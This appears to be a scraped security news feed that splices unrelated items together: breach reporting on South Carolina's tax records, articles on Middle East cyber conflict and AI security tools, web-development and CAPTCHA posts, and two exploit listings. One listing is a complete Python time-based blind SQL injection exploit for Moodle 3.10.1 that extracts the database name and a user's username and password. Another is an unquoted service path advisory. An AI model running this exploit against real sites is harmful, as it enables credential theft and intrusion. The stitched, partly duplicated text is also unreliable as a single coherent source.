For nearly a dozen years, residents of South Carolina have been kept in the dark by state and federal investigators over who was responsible for hacking into the state's revenue department in 2012 and stealing tax and bank account information for 3.6 million people. The answer may no longer be a mystery: KrebsOnSecurity found compelling clues suggesting the intrusion was carried out by the same Russian hacking crew that stole of millions of payment card records from big box retailers like Home Depot and Target in the years that followed.

For nearly a dozen years, residents of South Carolina have been kept in the dark by state and federal investigators over who was responsible for hacking into the state’s revenue department in 2012 and stealing tax and bank account information for 3.6 million people. The answer may no longer be a mystery: KrebsOnSecurity found compelling clues suggesting the intrusion was carried out by the same Russian hacking crew that stole of millions of payment card records from big box retailers like **Home Depot** and **Target** in the years that followed.

Questions about who stole tax and financial data on roughly three quarters of all South Carolina residents came to the fore last week at the confirmation hearing of **Mark Keel**, who was appointed in 2011 by **Gov. Nikki Haley** to head the state’s law enforcement division. If approved, this would be Keel’s third six-year term in that role.

_The Associated Press_ reports that Keel was careful not to release many details about the breach at his hearing, telling lawmakers he knows who did it but that he wasn’t ready to name anyone.

“I think the fact that we didn’t come up with a whole lot of people’s information that got breached is a testament to the work that people have done on this case,” Keel asserted.

A ten-year retrospective published in 2022 by _The Post and Courier_ in Columbia, S.C. said investigators determined the breach began on Aug. 13, 2012, after a state IT contractor clicked a malicious link in an email. State officials said they found out about the hack from federal law enforcement on October 10, 2012.

KrebsOnSecurity examined posts across dozens of cybercrime forums around that time, and found only one instance of someone selling large volumes of tax data in the year surrounding the breach date.

On Oct. 7, 2012 — three days before South Carolina officials say they first learned of the intrusion — a notorious cybercriminal who goes by the handle “**Rescator**” advertised the sale of “a database of the tax department of one of the states.”

“Bank account information, SSN and all other information,” Rescator’s sales thread on the Russian-language crime forum **Embargo** read. “If you purchase the entire database, I will give you access to it.”

A week later, Rescator posted a similar offer on the exclusive Russian forum **Mazafaka**, saying he was selling information from a U.S. state tax database, without naming the state. Rescator said the data exposed included Social Security Number (SSN), employer, name, address, phone, taxable income, tax refund amount, and bank account number.

“There is a lot of information, I am ready to sell the entire database, with access to the database, and in parts,” Rescator told Mazafaka members. “There is also information on corporate taxpayers.”

On Oct. 26, 2012, the state announced the breach publicly. State officials said they were working with investigators from the **U.S. Secret Service** and digital forensics experts from Mandiant, which produced an incident report (PDF) that was later published by South Carolina Dept. of Revenue. KrebsOnSecurity sought comment from the Secret Service, South Carolina prosecutors, and Mr. Keel’s office. This story will be updated if any of them respond. **Update:** The Secret Service declined to comment.

On Nov. 18, 2012, Rescator told fellow denizens of the forum **Verified** he was selling a database of 65,000 records with bank account information from several smaller, regional financial institutions. Rescator’s sales thread on Verified listed more than a dozen database fields, including account number, name, address, phone, tax ID, date of birth, employer and occupation.

Asked to provide more context about the database for sale, Rescator told forum members the database included financial records related to tax filings of a U.S. state. Rescator added that there was a second database of around 80,000 corporations that included social security numbers, names and addresses, but no financial information.

The AP says South Carolina paid $12 million to Experian for identity theft protection and credit monitoring for its residents after the breach.

“At the time, it was one of the largest breaches in U.S. history but has since been surpassed greatly by hacks to Equifax, Yahoo, Home Depot, Target and PlayStation,” the AP’s **Jeffrey Collins** wrote.

As it happens, Rescator’s criminal hacking crew was directly responsible for the 2013 breach at Target and the 2014 hack of Home Depot. The Target intrusion saw Rescator’s cybercrime shops selling roughly 40 million stolen payment cards, and 56 million cards from Home Depot customers.

Who is Rescator? On Dec. 14, 2023, KrebsOnSecurity published the results of a 10-year investigation into the identity of Rescator, a.k.a. **Mikhail Borisovich Shefel**, a 36-year-old who lives in Moscow and who recently changed his last name to Lenin.

Mr. Keel’s assertion that somehow the efforts of South Carolina officials following the breach may have lessened its impact on citizens seems unlikely. The stolen tax and financial data appears to have been sold openly on cybercrime forums by one of the Russian underground’s most aggressive and successful hacking crews.

While there are no indications from reviewing forum posts that Rescator ever sold the data, his sales threads came at a time when the incidence of tax refund fraud was skyrocketing.

Tax-related identity theft occurs when someone uses a stolen identity and SSN to file a tax return in that person’s name claiming a fraudulent refund. Victims usually first learn of the crime after having their returns rejected because scammers beat them to it. Even those who are not required to file a return can be victims of refund fraud, _as can those who are not actually owed a refund_ from the **U.S. Internal Revenue Service** (IRS).

According to a 2013 report from the Treasury Inspector General’s office, the IRS issued nearly $4 billion in bogus tax refunds in 2012, and more than $5.8 billion in 2013. The money largely was sent to people who stole SSNs and other information on U.S. citizens, and then filed fraudulent tax returns on those individuals claiming a large refund but at a different address.

It remains unclear why Shefel has never been officially implicated in the breaches at Target, Home Depot, or in South Carolina. It may be that Shefel _has_ been indicted, and that those indictments remain sealed for some reason. Perhaps prosecutors were hoping Shefel would decide to leave Russia, at which point it would be easier to apprehend him if he believed no one was looking for him.

But all signs are that Shefel is deeply rooted in Russia, and has no plans to leave. In January 2024, authorities in Australia, the United States and the U.K. levied financial sanctions against 33-year-old Russian man **Aleksandr Ermakov** for allegedly stealing data on 10 million customers of the Australian health insurance giant Medibank.

A week after those sanctions were put in place, KrebsOnSecurity published a deep dive on Ermakov, which found that he co-ran a Moscow-based IT security consulting business along with Mikhail Shefel called **Shtazi-IT**.

A Google-translated version of Shtazi dot ru. Image: Archive.org.

Who Stole 3.6M Tax Records from South Carolina?

Cyberattacks tripled over the past year in Israel, making it the most targeted nation in 2023, as cyber operations become a standard part of military conflicts and global protests.

Source: Ruma Aktar via Alamy Stock Photo

As tensions in the Middle East continue to escalate, cyberattacks and operations have become a standard part of the fabric of the geopolitical conflict.

Last week, the head of Israel's National Cyber Directorate blamed Iran and Hezbollah for "around the clock" cyberattacks against the country's networks, government agencies, and businesses, tripling in intensity as Israel's military operations continued against Hamas in Gaza. Following Quds Day — Iran's commemoration of its pro-Palestinian Jerusalem Day on April 5 — dozens of denial-of-service attacks disrupted Israeli targets, according to data from cybersecurity firm Radware.

While the volume of cyberattacks are running at a lower level so far this year, renewed tensions between Israel, Iran, and Lebanon could easily lead to more cyber activity, says Pascal Geenens, director of threat research for Tel Aviv-based Radware, a maker of cloud security solutions.

"There are two planes that we need to consider here," Geenens says. "One is more nation-state aligned, meaning purposely doing attacks against another nation, while the other is all the hacktivist activity — they just want to share their message \[and\] show that they're not happy with the situation."

Overall, Israel should be ready for more destructive cyberattacks, as Iran and other regional cyber groups have shown little restraint in such attacks, Google conclude in its "Tool of First Resort: Israel-Hamas War in Cyber" report, published in February. As Iran and Hezbollah appear ready to use destructive cyberattacks against both Israel and the United States, Israeli-linked groups likely will continue to target Iran, and hacktivists will likely target any organization they deem associated with their perceived enemies, the report stated.

"We assess with high confidence that Iran-linked groups are likely to continue to conduct destructive cyber attacks, particularly in the event of any perceived escalation to the conflict, which may include kinetic activity against Iranian proxy groups in various countries, such as Lebanon and Yemen," the company stated in the report.

**Not Your Father's Cyber Conflict**

When Russia invaded Ukraine, the Russian military used cyberattacks to target Ukraine prior to the invasion and during the invasion, and widely attacked the US and Ukraine's allies in Europe in the two years since the start of the war.

A significant spike in cyberattacks came prior to and after Oct. 7, while much more modest levels of activity targeted Israel this year. Source: Radware

For the Middle East, the cyber conflict has a different character. On one hand, the participants in the conflict have different strengths and limitations, which are affecting their options and making the cyber conflict more asymmetrical. Where the Russian government has a unity of purpose, Iran and Hamas are more opportunistic adversaries. Where Russia and Ukraine have similar cyber capabilities, Israel's military operations have limited Hamas' ability to respond, and the country has the most sophisticated cyber-offensive capabilities in the region, says Ben Read, head of cyber espionage analysis for Google Cloud's Mandiant incident-response group.

"Iran is very opposed to Israel, but aren't a direct party to the conflict, so their goals aren't necessarily about supporting the seizure of territory in the same sort of way as Russia," he says. "Because conventional weapons are not \[currently\] an outcome acceptable to Iran, they are using cyber to do some destructive \[operations\]. ... Cyber can be an easier tool to reach for there."

Iran is not the only anti-Israeli actor in the region. Google has observed cyber operations by groups linked to Hezbollah, a Lebanese Islamist political party and militant group aligned with Iran.

Iran has also been the target of disruptive cyber operations in the context of the conflict, says Kirsten Dennesen, reporting analyst with Google's Threat Analysis Group (TAG). Several disruptive attacks on the nation's infrastructure have been attributed to Predatory Sparrow, which reappeared in October and attacked Iranian gas stations in December, and which some analysts have linked to Israel.

"Telegraphing intent and demonstrating involvement in the conflict without escalating or directly taking part in on-the-ground confrontation ... limits potential blowback while also giving regional players the opportunity to project power through the cyber domain," she says. "Moreover, cyber capabilities can be quickly deployed at minimal cost by actors who may wish to avoid armed conflict."

**Resurgence in Hacktivism**

Nation-states are not the only actors involved in the conflict. In the past year, hacktivism has taken off as technologically savvy protesters react to the Russia-Ukraine war and the conflict between Israel and Hamas. Much of the increase in attack activity in Israel is due to hacktivism, as is demonstrated by sharp upticks in denial-of-service attacks, says Radware's Geenens.

"It's not like it did not exist before, but before they were much less organized, and now they have like this ability to gather on Telegram," he says. "They all started to communicate with each other through hashtags. They find each other much more easy, so they come together and create alliances to perform attacks."

In the past, the groups banded together under the Anonymous name, claiming the monicker for their own and attempting to get other groups to sign up. Today, they use operation-specific hashtags on Telegram to gain like-minded collaborators, a much more efficient method of operation, Geenens says.

Hacktivism likely will continue to fuel attacks against not only Israel, but other countries as well, he says. Attacks are more likely to ramp up quickly as nation-states develop standard techniques and hacktivists are able to collaborate more efficiently.

"Anything that happens in the future," Geenens says, "whether it be a military operation or an outcome of an election that they don't like or somebody says something that that they don't like — they will be there and there will be a wave of DDoS attacks."

**About the Author(s)**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Cyber Operations Intensify in Middle East, With Israel the Main Target

Google's American Fuzzy Lop is a brute-force fuzzer coupled with an exceedingly simple but rock-solid instrumentation-guided genetic algorithm. afl++ is a superior fork to Google's afl. It has more speed, more and better mutations, more and better instrumentation, custom module support, etc.

American Fuzzy Lop plus plus 4.20c

Moodle version 3.10.1 suffers from a remote time-based SQL injection vulnerability.

    # Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter# Google Dork: # Date: 04/11/2023# Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx)# Vendor Homepage: https://moodle.org/# Software Link: # Version: 3.10.1# Tested on: Linux# CVE : CVE-2021-36393import requestsimport stringfrom termcolor import colored# Request detailsURL = "http://127.0.0.1:8080/moodle/lib/ajax/service.php?sesskey=ZT0E6J0xWe&info=core_course_get_enrolled_courses_by_timeline_classification"HEADERS = {    "Accept": "application/json, text/javascript, */*; q=0.01",    "Content-Type": "application/json",    "X-Requested-With": "XMLHttpRequest",    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36",    "Origin": "http://127.0.0.1:8080",    "Referer": "http://127.0.0.1:8080/moodle/my/",    "Accept-Encoding": "gzip, deflate",    "Accept-Language": "en-US,en;q=0.9",    "Cookie": "MoodleSession=5b1rk2pfdpbcq2i5hmmern1os0",    "Connection": "close"}# Characters to testcharacters_to_test = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$^&*()-_=+[]{}|;:'\",.<>?/"def test_character(payload):    response = requests.post(URL, headers=HEADERS, json=[payload])    return response.elapsed.total_seconds() >= 3def extract_value(column, label):    base_payload = {        "index": 0,        "methodname": "core_course_get_enrolled_courses_by_timeline_classification",        "args": {            "offset": 0,            "limit": 0,            "classification": "all",            "sort": "",            "customfieldname": "",            "customfieldvalue": ""        }    }    result = ""    for _ in range(50):  # Assumes a maximum of 50 characters for the value        character_found = False        for character in characters_to_test:            if column == "database()":                base_payload["args"]["sort"] = f"fullname OR (database()) LIKE '{result + character}%' AND SLEEP(3)"            else:                base_payload["args"]["sort"] = f"fullname OR (SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE '{result + character}%' AND SLEEP(3)"                        if test_character(base_payload):                result += character                print(colored(f"{label}: {result}", 'red'), end="\r")                character_found = True                break        if not character_found:            break    # Print the final result    print(colored(f"{label}: {result}", 'red'))if __name__ == "__main__":    extract_value("database()", "Database")    extract_value("username", "Username")    extract_value("password", "Password")

Moodle 3.10.1 SQL Injection

By Owais Sultan
Boost user engagement and SEO ranking with these key web development practices for media sites. Discover responsive design, page speed optimization, user-friendly CMS, SEO structure, and accessibility best practices.
This is a post from HackRead.com Read the original post: Best Practices for Optimizing Web Development Standards for Media Sites

Social media has permeated our lives, from interacting with loved ones to gathering information and conducting business. Consumers use their favourite websites to find products or services, but social media’s power goes beyond connecting people and businesses. It has the potential to transform all industries’ online presence and shape web development processes in highly effective ways to drive corporate growth and improve the consumer experience.

Businesses can use quality-assured code review services to eliminate memory leaks and poor performance, ensuring that everything runs smoothly while maintaining stability and security. The code review service streamlines and accelerates the software development process in ways few other approaches can.

Maintaining high web development standards for media sites is critical for providing a smooth user experience and keeping visitors engaged. Here are some of the main practices to follow:

****Responsive Design****

Responsive web design (RWD) is a web design technique that allows web pages to load efficiently on all screen sizes and resolutions while maintaining usability. It is a multi-device web approach that focuses not only on screen resolutions and screen sizes but also on overall design.

For example, you can’t just design for desktop computers; you also have to consider mobile devices to provide a better user experience. Furthermore, half of all users use mobile devices, which account for the vast majority of search engine visits.

You’ll also need to consider device resolution to ensure that all users have a seamless navigation and browsing experience.

Follow responsive design best practices to ensure that your media site is responsive and mobile-friendly, providing a seamless browsing experience across multiple platforms and screen sizes. It enables your site to adapt to different screen resolutions, resulting in higher engagement. 

****Page Load Optimization/ Page Speed****

It is a phrase that describes how quickly your content loads when a user navigates to a page on your website. This phrase is known as “page speed.” It is a measure of how long it takes for a specific page to load. Users may leave your website if the pages load slowly, reducing your chances of attracting more visitors and sales.

Another reason search engine optimization is important is that Google ranks web pages differently based on a variety of factors. Page is one of the ranking factors used on both mobile devices and desktop computers.

Furthermore, media websites frequently feature multimedia assets such as large photographs, videos, and other forms of media. To maintain high standards, page load times must be optimized. Image compression, CSS and JavaScript file minification and load time reduction can all help to improve overall performance.

****CMS Integration****

The term “content management system” refers to a software application that allows users to create, publish, and edit content. Content files stored in a CMS are saved in a database and displayed in layers based on a collection of templates, similar to how a webpage works.

****CMS’s common functions include the following:****

*   It improves the digital experience.
*   It enables users to generate and format information with ease.
*   CMS keeps files in a single location, making it easy for users to find them.
*   It enables authorized users to manage information based on their roles, such as managers, editors, and authors.
*   The software notifies the user when and where the content was released.

****Benefits of CMS****

Multiple authorized personnel can view, edit, schedule, and manage the content that will be published. It offers a user-friendly experience, especially for those who are not technically savvy, allowing them to quickly create and manage their own content.

CMS is cost-effective because it eliminates the need for front-end developers to make changes to the website, allowing users to easily publish content and promoting a digital experience for both visitors and editors. It simplifies and streamlines content distribution to other platforms.

Businesses must implement a dependable and simple CMS for managing media sites, which allows for easy content creation, editing, and posting.

CMS allows you to easily categorize articles and organize media resources and assets.

****Structure that is SEO-Friendly.****

Ensure that your website follows the best SEO practices. Meta descriptions, appropriate heading tags, keywords, and other SEO-friendly content were used. It enables your website to become visible and attract organic traffic.

A rational web structure attracts users while also making it easy for search engines to index and scan your website. To begin, the following are the most important elements:

*   Focus on scannability.
*   Give clear calls to action.
*   Use your website’s header wisely.
*   Maximize the visual hierarchy guidelines.
*   Create SEO-friendly URLs for search engines.
*   Create a high-quality user experience (UI).
*   Use keywords to organize your web page layout.

****Accessibility****

Accessibility is a feature found on high-quality multimedia websites. This feature ensures that all users, including those with disabilities, can easily navigate your website. Accessibility benefits both mobile device users and those with slow internet access. 

****Here’s how to implement accessibility:****

Follow the “Web Content Accessibility Guidelines” to ensure that your website is accessible to people with disabilities, such as those who struggle with their vision or hearing.

Accessibility practices should be implemented from the start of the project and tested as needed. If it is not completed soon, it may result in higher future expenses.

****Conclusion****

Web development and social media are extremely effective tools for any business. However, when the two technologies are combined, their ability to drive business growth may improve. Employing and combining appropriate web development and social media content practices can help improve company recognition, attract visitors, generate conversions, and strengthen brand reliability and consumer loyalty.

Not only should their capabilities be combined, but maintaining high standards in web development for media sites is critical to staying current with technology trends and making all activities smoother and more seamless, increasing productivity and efficiency.

Remember that maintaining high-quality web development for media websites is an ongoing process. Regularly checking your site’s operation, soliciting user feedback, and keeping up with the latest web development trends are all important ways to improve your media site.

1.  Is CSS Necessary for Responsive Web Design?
2.  5 Best CAPTCHA Plugins for WordPress Websites
3.  5 Effective Web Design Strategies to Increase Your ROI
4.  5 must-try user flow diagramming tools for UX designing
5.  Embracing Minimalism: “Less is More” Approach in UI/UX Design

Best Practices for Optimizing Web Development Standards for Media Sites

Our collection of the most relevant reporting and industry perspectives for those guiding cybersecurity strategies and focused on SecOps. Also included: facing hard truths in software security, and the latest guidance from the NSA.

Source: Chroma Craft Media Group via Alamy Stock Photo

Welcome to CISO Corner, Dark Reading's weekly digest of articles tailored specifically to security operations readers and security leaders. Every week, we offer articles gleaned from across our news operation, The Edge, DR Technology, DR Global, and our Commentary section. We're committed to bringing you a diverse set of perspectives to support the job of operationalizing cybersecurity strategies, for leaders at organizations of all shapes and sizes.

**In this issue of CISO Corner**

*   The Race for AI-Powered Security Platforms Heats Up
    
*   Why MLBOMs Are Useful for Securing the AI/ML Supply Chain
    
*   The Fight for Cybersecurity Awareness
    
*   Ambitious Training Initiative Taps Talents of Blind and Visually Impaired
    
*   Vietnamese Cybercrime Group CoralRaider Nets Financial Data
    
*   XZ Utils Scare Exposes Hard Truths About Software Security
    
*   NSA Updates Zero-Trust Advice to Reduce Attack Surfaces
    

**The Race for AI-Powered Security Platforms Heats Up**

By Robert Lemos, Contributing Writer, Dark Reading

Microsoft, Google, and Simbian each offers generative AI systems that allow security operations teams to use natural language to automate cybersecurity tasks.

Both Google and Microsoft have committed massive resources to developing generative artificial intelligence (AI) tools for cybersecurity. Security Copilot from Microsoft can find breaches, gather, and analyze data with help from generative AI. Google's Gemini in Security is a similar rival service.

Now a startup has entered the fray, Simbian, with its own system that leverages generative AI as well as large language models (LLMs) to help security teams by automating configuring event management systems (SIEM) or security orchestration, automation, and response (SOAR).

While each offering has its own set of benefits, they all strive to streamline processes for strained cybersecurity teams. The question that has yet to be answered is whether teams will ultimately trust the automated systems to operate as intended.

Read more: The Race for AI-Powered Security Platforms Heats Up

Related: How AI and Automation Can Help Bridge the Cybersecurity Talent Gap

**Why MLBOMs Are Useful for Securing the AI/ML Supply Chain**

Commentary By Diana Kelley, CISO, Protect AI

A machine learning bill of materials (MLBOM) framework can bring transparency, auditability, control, and forensic insight into AI and ML supply chains.

The software bill of materials (SBOM) has become an essential tool for identifying the code that makes up an application, but in the age of artificial intelligence (AI) the SBOM has some limitations in machine learning frameworks.

A machine learning software bill of materials, or MLBOM, could fill the gaps left in a traditional SBOM and add protections to data and assets.

Read More: Why MLBOMs Are Useful for Securing the AI/ML Supply Chain

Related: Where SBOMs Stand Today

**  
The Fight for Cybersecurity Awareness**

Commentary By Erik Gross, CISO, QAD

Investing in cybersecurity skills creates a safer digital world for everyone.

Spreading awareness of risk is the best way to mitigate cybersecurity risk, but the task of constantly training and re-training people on the latest threats can be daunting. The age of artificial intelligence is making it even more difficult.

Building a culture of security is paramount, and it can be achieved with thoughtful cybersecurity training with a focus on a personal approach, storytelling, and helping people feel comfortable talking openly about cybersecurity. Humans are unpredictable, and a cybersecurity training process that accepts that humans are complex creatures have had the most success.

Read More: The Fight for Cybersecurity Awareness

Related: Q&A: The Cybersecurity Training Gap in Industrial Networks

**Ambitious Training Initiative Taps Talents of Blind and Visually Impaired**

By Jennifer Lawinski, Contributing Writer, Dark Reading

Novacoast's Apex Program prepares individuals with visual impairments for cybersecurity careers.

Blind and visually impaired (BVI) people are an untapped talent resource for cybersecurity companies struggling to attract talent. With just a computer outfitted with a screen reader and Braille keyboard, BVI people can become valuable contributors. Two cyber CEOs have launched Apex Program, an online, on-demand course for BVI people who want to break into cybersecurity.

So far, four students have completed the course and one has already landed a job as a SOC 1 Analyst. Now the White House is getting involved, and there's even a short film in the works featuring the Apex Program.

Read More: Ambitious Training Initiative Taps Talents of Blind and Visually Impaired

Related: 3 Ways Businesses Can Overcome the Cybersecurity Skills Shortage

**Vietnamese Cybercrime Group CoralRaider Nets Financial Data**

By Robert Lemos, Contributing Writer, Dark Reading

With a complex attack chain and using Telegram for its command and control, CoralRaider targets victims in Asian countries — and appears to have accidentally infected itself as well.

A newcomer on the Vietnamese cybercrime scene, a group called CoralRaider is making moves — and rookie mistakes like infecting their own systems — along the way.

Security researchers at Cisco Talos have been tracking CoralRaider's activities and found they are motivated by profit, even though the group is having trouble getting their operation off the ground. So far, Cisco Talos analysts haven't seen any indication CoralRaider has yet successfully delivered a payload, but the group is actively working to improve their cybercrime skills.

Read More: Vietnamese Cybercrime Group CoralRaider Nets Financial Data

Related: Ransomware, Junk Bank Accounts: Cyber Threats Proliferate in Vietnam

**  
XZ Utils Scare Exposes Hard Truths About Software Security**

By Jai Vijayan, Contributing Writer, Dark Reading

Much of the open source code embedded in enterprise software stacks comes from small, under-resourced, volunteer-run projects.

The backdoor recently discovered in the XZ Utils tool should be a wake-up call for cyber teams that open source repositories are riddled with vulnerabilities.

These projects are volunteer-run, under-resourced, and unable to keep up with the latest threats. XZ Utils is itself a one-person operation. Enterprises using code from these open sources do so at their own risk.

Organizations are advised to vet their use of code from public repositories and determine whether they have appropriate security controls. Experts also recommend having engineering and cybersecurity teams define processes and roles for onboarding open source code.

Read More: XZ Utils Scare Exposes Hard Truths About Software Security

**NSA Updates Zero-Trust Advice to Reduce Attack Surfaces**

By Dark Reading Staff

Agency encourages broader use of encryption, data-loss prevention, as well as data rights management to safeguard data, networks, and users.

In its ongoing effort to provide both the public, as well as the private, sectors with support in getting on a path to zero trust, the National Security Administration has issued guidance related to data protection, or as NSA categorizes it, the "data pillar." Recommendations from the agency include the use of encryption, tagging, labeling, and more.

Prior to this data security guidance, NSA provided a detailed guide to network macro- and micro-segmentation and its role in building up a zero-trust framework.

Read More: NSA Updates Zero-Trust Advice to Reduce Attack Surfaces

Related: NSA's Zero-Trust Guidelines Focus on Segmentation

CISO Corner: Securing the AI Supply Chain; AI-Powered Security Platforms; Fighting for Cyber Awareness

Microsoft, Google, and Simbian each offers generative AI systems that allow security operations teams to use natural language to automate cybersecurity tasks.

Source: Ole.CNX via Shutterstock

When a major vulnerability shakes up the cybersecurity world — such as the recent XZ backdoor or the Log4j2 flaws of 2021 — the first question that most companies ask is, "Are we affected?" In the absence of well-written playbooks, the simple question can require a great deal of effort to answer.

Microsoft and Google are investing heavily in generative artificial intelligence (GenAI) systems that can turn large security questions into concrete actions, assist security operations, and, increasingly, take automated actions. Microsoft offers overworked security operations centers with Security Copilot, a GenAI-based service that can identify breaches, connect threat signals, and analyze data. And Google's Gemini in Security is a collection of security capabilities powered by the company's Gemini GenAI.

Startup Simbian is joining the race with its new GenAI-based platform for helping companies tackle their security operations. Simbian's system combines large language models (LLMs) for summarizing data and understanding native languages, other machine learning models to connect disparate data points, and a software based expert system based on security information culled from the Internet.

Where configuring a security information and event management system (SIEM) or a security orchestration, automation, and response (SOAR) system could take weeks or months, using AI cuts the time to — in some cases — seconds, says Ambuj Kumar, co-founder and CEO of Simbian.

"With Simbian, literally, these things are done in seconds," he says. "You ask a question, you express your goal in natural language, we break into steps code execution, and this is all done automatically. It's self sufficient."

Helping overworked security analysts and incident responders streamline their jobs is a perfect application for the more powerful capabilities of GenAI, says Eric Doerr, vice president of engineering at Google Cloud.

"The opportunity in security is particularly acute given the elevated threat landscape, the well publicized talent gap in cybersecurity professionals, and the toil that is the status quo in most security teams," Doerr says. "Accelerating productivity and driving down mean time to detect, respond, and contain \[or\] mitigate threats through the use of GenAI will enable security teams to catch up and defend their organizations more successfully."

**Different Starting Points, Different 'Advantages'**

Google's advantages in the market are evident. The IT and Internet giant has the budget to stay the course, the technical expertise in machine learning and AI from its DeepMind projects to innovate, and access to a lot of training data — a critical consideration for creating LLMs.

"We have a tremendous amount of proprietary data that we've used to train a custom security LLM — SecLM — which is part of Gemini for Security," Doerr says. "This is the superset of 20 years of Mandiant intelligence, VirusTotal, and more, and we're the only platform that has an open API — part of Gemini for Security — that allows partners and enterprise customers to extend our security solutions and have a single AI that can operate with all the context of the enterprise."

Like Simbian's guidance, Gemini in Security Operations — one capability under the Gemini in Security umbrella — will assist in investigations starting at the end of April, guiding the security analyst and recommending actions from within Chronicle Enterprise.

Simbian uses natural language queries to generate results, so asking, "Are we affected by the XZ vulnerability?" will produce a table of IP addresses of vulnerable applications. The systems also uses curated security knowledge gathered from Internet to create guidebooks for security analysts that show them a script of prompts to give to the system to accomplish a specific task.

"The guidebook is a way of personalizing or creating trusted content," says Simbian's Kumar. "Right now, we are creating the guidebooks, but once ... people just start to use it, then they can create their own."

**Strong ROI Claims for LLMs**

The returns on investment will grow as companies move from a manual process to an assisted process to autonomous activity. Most GenAI-based systems have advanced only to the stage of an assistant or copilot, when it suggests actions or takes only a limited series of actions, after gaining the users permissions.

The real return on investment will come later, Kumar says.

"What we are excited about building is autonomous — autonomous is making decisions on your behalf that are within the scope of guidance you have given it," he says.

Google's Gemini also seems to straddle the gap between an AI assistant and an automated engine. Financial services firm Fiserv is using Gemini in Security Operations for creating detections and playbooks faster and with less effort, and for helping security analysts quickly find answers using natural language search, boosting the productivity of security teams, Doerr says.

Yet trust is still an issue and a hurdle for increased automation, he says. To bolster trust in the system and solutions, Google remains focused on creating explainable AI systems that are transparent in how they come to a decision.

"When you use a natural language input to create a new detection, we show you the detection language syntax and you choose to run that," he says. "This is part of the process of building confidence and context with Gemini for Security."

**About the Author(s)**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

The Race for AI-Powered Security Platforms Heats Up

Terratec dmx_6fire USB version 1.23.0.02 suffers from an unquoted service path vulnerability.

    # Exploit Title:  Terratec dmx_6fire USB - Unquoted Service Path# Google Dork: null# Date: 4/10/2024# Exploit Author: Joseph Kwabena Fiagbor# Vendor Homepage: https://dmx-6fire-24-96-controlpanel.software.informer.com/download/# Software Link:# Version: v.1.23.0.02# Tested on: windows 7-11# CVE : CVE-2024-318041. Description:The Terratec dmx_6fire usb installs as a service with an unquoted servicepath runningwith SYSTEM privileges.This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system.2. Proof> C:\Users\Astra>sc qc "ttdmx6firesvc"> {SC] QueryServiceConfig SUCCESS>> SERVICE_NAME: ttdmx6firesvc>         TYPE               : 10  WIN32_OWN_PROCESS>         START_TYPE         : 2   AUTO_START>         ERROR_CONTROL      : 1   NORMAL>         BINARY_PATH_NAME   : C:\Program Files\TerraTec\DMX6FireUSB\ttdmx6firesvc.exe -service>         LOAD_ORDER_GROUP   : PlugPlay>         TAG                : 0>         DISPLAY_NAME       : DMX6Fire Control>         DEPENDENCIES       : eventlog>                            : PlugPlay>         SERVICE_START_NAME : LocalSystem>>

Terratec dmx_6fire USB 1.23.0.02 Unquoted Service Path

By Waqas
Here's an updated list of five effective CAPTCHA plugins for WordPress that can help enhance the security of your website by preventing spam and bot activities:
This is a post from HackRead.com Read the original post: 5 Best CAPTCHA Plugins for WordPress Websites

As of 2024, the internet hosts over 1.89 billion websites, with approximately 835 million utilizing WordPress as their Content Management System (CMS). This represents about 43.3% of all websites globally.

Not only do these stats represent the expanding reach of the internet, but they also make WordPress a lucrative target for cybercriminals and spammers. While **WordPress security tips** are widely discussed to keep cybercriminals at bay, spamming is something not every website owner, especially newbies, is familiar with.

In this article, we will discuss five **CAPTCHA solutions** for WordPress and how a CAPTCHA plugin works.

Here’s an updated list of five effective CAPTCHA plugins for WordPress that can help enhance the security of your website by preventing spam and **bot activities:**

1.  **Captcha Plus**: This plugin offers multiple CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) options, including image-based, math-based, and Google reCAPTCHA. It’s known for its high performance and ease of customization, although it may be a bit overwhelming for beginners.
2.  **Google reCAPTCHA**: Perhaps the most well-known, this plugin uses advanced technology to differentiate humans from bots without disrupting the user experience. It’s seamlessly integrated into your forms and is supported by major form builders like WPForms.
3.  **Really Simple CAPTCHA**: As the name suggests, this plugin keeps it straightforward. It’s not as feature-rich as others, but it’s highly effective at blocking spam and is compatible with many form plugins​.
4.  **hCaptcha**: Offers a robust bot detection system and comes in both free and pro versions. The pro version includes advanced features like custom challenge creation and detailed analytics. It integrates well with a variety of forms and page builders, making it a versatile choice​.
5.  **Securimage-WP**: Great for those who prioritize a balance between strong security measures and maintaining user-friendliness. It integrates easily with popular form plugins like Contact Form 7 and Gravity Forms​.

****Honorable Mention: Akismet Anti-spam: Spam Protection****

Although not a CAPTCHA plugin, **Akismet Anti-spam** is a plugin designed to protect websites, particularly those using WordPress, from spam. Developed by Automattic, the same company behind WordPress.com, Akismet works by filtering out spam comments and form submissions.

It uses automated algorithms and community feedback to identify and block spam, helping keep websites clean and free from unwanted content. Akismet effectively reduces the time and effort needed to moderate spam, allowing website owners to focus on creating and managing content rather than dealing with spammy submissions.

****How does a CAPTCHA plugin work****

A CAPTCHA plugin works by presenting a challenge to website users to verify that they are human and not automated bots. Typically, this challenge involves completing a task that is easy for humans to do but difficult for bots to replicate, such as identifying distorted text, selecting certain images, or solving a simple puzzle.

The plugin then validates the user’s response, allowing access to the website if the challenge is completed correctly. This helps prevent automated bots from engaging in activities such as spamming forms, creating fake accounts, or launching malicious attacks on the website including DDoS attacks.

1.  New AI tool aims to make CAPTCHA a thing of the past
2.  Facebook captcha wants users to upload a clear photo of them
3.  Proton CAPTCHA: Privacy-First CAPTCHA Defense Against Bots

